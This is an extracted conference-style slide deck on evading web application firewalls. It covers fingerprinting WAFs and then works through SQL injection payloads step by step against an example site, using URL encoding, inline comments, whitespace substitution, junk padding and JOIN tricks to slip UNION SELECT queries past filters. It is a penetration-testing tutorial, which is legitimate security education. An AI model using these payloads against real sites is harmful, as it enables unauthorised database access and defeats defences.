Waf bypassing Techniques

Waf bypassing Techniques

• 1.
  WAF BypassingTechniques
• 2.
   Avinash KumarThapa, Senior Security Analyst in Network Intelligence India  Bug Hunter on Hackerone  CTF Author on Vulnhub.com  Some exploits and PoC on Exploit-db as well.  Passionate about Web Applications Security and Exploit Writing.
• 3.
  Agenda  Introduction toWeb Applications Firewalls  Operation Modes  Vendors  Fingerprinting WAF  Ways to Bypass WAFs  Practical Cases for Bypassing  Conclusion
• 4.
  Introduction to WebApplication Firewalls  Presents as Application Layer  Monitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers based upon their pre-defined signatures in a database.  Basic goal of WAF is to monitor and block the contents that violates pre-defined policy.  These pre-defined policies are patterns of user input which ends up in potential attack.  Understands HTTP and HTTPs traffic better than any traditional firewall.
• 5.
  Types of OperationModes
• 6.
  Negative Mode A negativesecurity model recognize attacks by relying on a database of expected attack signatures. Example: Do not allow in any page, any argument value (user input) which match potential XSS strings like <script>,</script>, String.fromCharCode, etc. Pros: ● Less time to implement. Cons: ● Less protection.
• 7.
  Positive Model  Apositive security model enforces positive behaviour by learning the application logic and the building a security policy of valid known requests as a user interacts with the application. Example:  Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until 65535.  Using intval conditions on page. (Accepts only integers) Pros: ● Better performance (less rules). ● Less false positives. Cons: ● Much more time to implement. ● Some vendors provide “automatic learning mode”, they help, but are far from perfect, in the end, you always need a skilled human to review the policies
• 8.
  Mix Model  Combinationof both positive and negative model.
• 9.
  Testing Environments  GoogleChrome  Mozilla Firefox  Internet Explorer  Opera Browser
• 10.
  Products  F5 BIGIP WAF  Sucuri  Modsecurity  Imperva Incapsula  PHP-IDS (PHP Intrusion Detection System)  Quick Defense  AQTRONIX WebKnight (For IIS and based on ISAPI filters)  Barracuda WAF
• 11.
  Fingerprinting WAF Adds Cookieto the HTTP Communication.  For Citrix Netscaler WAF
• 12.
  Fingerprinting WAF  F5BIG IP ASM
• 13.
  Fingerprinting WAF  Onthe basis of HTTP Response Other WAF’s may be detected by the type of http response we receive when submitting a malicious request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403, 406, 419, 500, 501 etc.
• 14.
  Fingerprinting WAF  Responsefor BIG F5
• 15.
  Fingerprinting WAF  Requestand Response for ModSecurity Firewall Request:
• 16.
  Fingerprinting WAF  Requestand Response for ModSecurity Firewall Response:
• 17.
  Fingerprinting WAF  Responsefor WebKnight Firewall Response:
• 18.
  Fingerprinting WAF  Responsefor WebKnight Firewall Response rendered on Browser
• 19.
  Automatic Fingerprinting WAF Using Nmap Scripts nmap -p80 --script http-waf-detect <host>  Using WaFw00f.py Python Wafw00f.py –url <URL>
• 20.
  Techniques to BypassWAFs  Bypassing WAF For SQL Injection Vulnerabilities  Bypassing WAF for XSS Issues  Bypassing WAF for LFI and RFI vulnerabilities.
• 21.
  General Techniques tobypass WAF  Null Character Injection  Mixed Case  Inline Comments  Chunked Requests  Buffer Overflow  HTTP Parameter Pollution  URL encoding  Keyword Splitting  Replaced Keywords  Ignoring Cookies  Using Data URIs  Header Injection
• 22.
  Bypassing WAF ForSQL Injection Vulnerabilities
• 23.
  https://abc.com/index.php?id=1 Example 1 (WithoutWAF) ‘ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6 Example 1 (With WAF) https://abc.com/index.php?id=1 ‘ HTTP/1.1 403 Forbidden Error Or HTTP/1.1 406 Not Acceptable or HTTP/1.1 404 Not Found Or HTTP/1.1 500 Internal Server Error Or HTTP/1.1 400 Bad Request
• 24.
  Some recon onWAF Came to know Modsecurity is in action https://abc.com/index.php?id=1 “ HTTP/1.1 200 OK https://abc.com/index.php?id=1 %27 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for right syntax to use near '1’ ' at line 6 This technique is URL Encoding Some time you need to use: 1) Double URL Encoding :- %2527%27’ 2) Triple URL Encoding:- %252525%2527%27’ (This is very rare Case)
• 25.
  https://abc.com/index.php?id=1 %27 ORDERBY 1%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Order’ keyword is Blocked ?? • ‘Order by ’ keyword is Blocked ?? • Any other alternative of Order by query ?? • Does Spaces are blocked Let’s Try 
• 26.
  https://abc.com/index.php?id=1 %27 ORDER%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Order’ keyword is Blocked • Check again ‘order’ is blocked ?? https://abc.com/index.php?id=1 %27ORDER%23 HTTP/1.1 200 OK New Assumptions in mind • ‘Order’ keyword is not Blocked • What is blocked then ??? SPACES ARE BLOCKED
• 27.
  https://abc.com/index.php?id=1 %27 ORDERby 1 %23 HTTP/1.1 403 Forbidden https://abc.com/index.php?id=1 %27ORDERby1 %23 HTTP/1.1 200 OK No Assumptions in mind Because spaces are blocked only
• 28.
  Techniques to bypassspaces Using ‘+’ instead of space like:- order+by+1 (Mostly blocked) Using inline comments instead of spaces ‘/**/’ like:- order/**/by/**/1 Using combination of inline comments and URL encoding instead of spaces like: • Order/%2a%2a/by/%2a%2a/1 • Order%2f**%2fby%2f**%2f1 Using combination of inline comments, URL encoding & Junk Characters instead of spaces like: • Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1 • Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
• 29.
  Techniques to bypassspaces Using white space characters %0a, %0b, %0c, %0d,%a0,%09,%01 Query will be  ORDER%0aby%0a1  ORDER%0bby%0b1  ORDER%0cby%0c1  ORDER%0Dby%0D1  ORDER%A0by%A01  ORDER%0D%0Aby%0D%0A1
• 30.
  https://abc.com/index.php?id=1 %27/**/ORDER/**/by/**/1%23 HTTP/1.1 200OK Let’s Suppose no. of columns are 3 https://abc.com/index.php?id=1 %27 UNION SELECT 1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Spaces’ are Blocked ??
• 31.
  https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23 HTTP/1.1 403Forbidden Assumptions in mind • ‘Spaces’ were bypassed using inline comments..…Still blocked??? • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
• 32.
  Techniques to Bypass UsingInline comments:  /!*50000UNION*/  /*!40000UNION*/  /*!00000UNION*/ If UNION is blocked Using URL Encoding Techniques:  %53nion  %2553nion  %55%4e%49%4f%4e (UNION) Double URL Encoding Triple URL Encoding
• 33.
  https://abc.com/index.php?id=1 %27/**//*!50000UNION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!40000UNION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1%27/**//*!%55NION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
• 34.
  https://abc.com/index.php?id=1 %27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23 https://abc.com/index.php?id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
• 35.
  https://abc.com/index.php?id=1 %27/**//*!50000UNION*/1,2,3%23 HTTP/1.1 200OK https://abc.com/index.php?id=1 %27/**//*!50000SELECT*/1,2,3%23 HTTP/1.1 200 OK Assumptions in mind • ‘UNION’ keyword is NOT blocked. • ‘SELECT’ keyword is NOT blocked. • ‘Intergers’ are NOT blocked • ‘Commas’ are NOT blocked • Combination of “UNION SELECT” is blocked ? • “SELECT with Integers” are NOT blocked
• 36.
  Techniques to bypasscombination of “union select” Using combination of inline comments and URL encoding : • /*!50000%55niOn*/ /*!50000%53eLECT*/ Using white spaces and URL encoding of comments (#) • Union%23%0aSELECT • Union%23%0bSELECT • Union%23%0cSELECT • Union%23%0DSELECT • Union%23%A0SELECT Using combination of inline comments and URL encoding : • /*!50000%55niOn*/ /*!50000%53eLECT*/
• 37.
  Techniques to bypasscombination of “union select” Using Buffer Overflow UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT Some time need to increase the junk as per the requirement UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXX%0ASELECT
• 38.
  Techniques to bypasscombination of “union select” Using Distinct statement UNION DISTINCT SELECT Using Distinctrow statement UNION DISTINCTROW SELECT
• 39.
  https://abc.com/index.php?id=1 %27/**/UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23 HTTP/1.1 200 OK
• 40.
  Special Case :What if Commas got blocked ?
• 41.
  https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23 HTTP/1.1 403Forbidden Assumptions in mind • ‘UNION’ keyword is NOT blocked. • ‘SELECT’ keyword is NOT blocked. • ‘Intergers’ are NOT blocked • ‘Commas’ are blocked • Combination of “UNION SELECT” is NOT blocked ? • “SELECT with Integers” are NOT blocked Time to bypass commas “,”.
• 42.
  Basic Bypasses  URLEncoding - %2c  ,  Double URL Encoding - %252c  %2c  ,  Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
• 43.
  Basic Bypasses  URLEncoding - %2c  ,  Double URL Encoding - %252c  %2c  ,  Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
• 44.
  Advance way tobypass “Commas”  Using JOIN  JOIN used for columns as UNION is used for the rows  We have SELECT 1,2,3  SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
• 45.
  Advance way tobypass “Commas” https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/J OIN/**/(SELECT/**/2)b%23 HTTP/1.1 200 OK
• 46.
  Similar Approach forother Vulnerabilities  For XSS  For LFI / RFI DEMO TIME 
• 47.
  References  Images inslides 10,11,14,15,16,17  Taken from http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYB ALOCH.pdf Thank you..!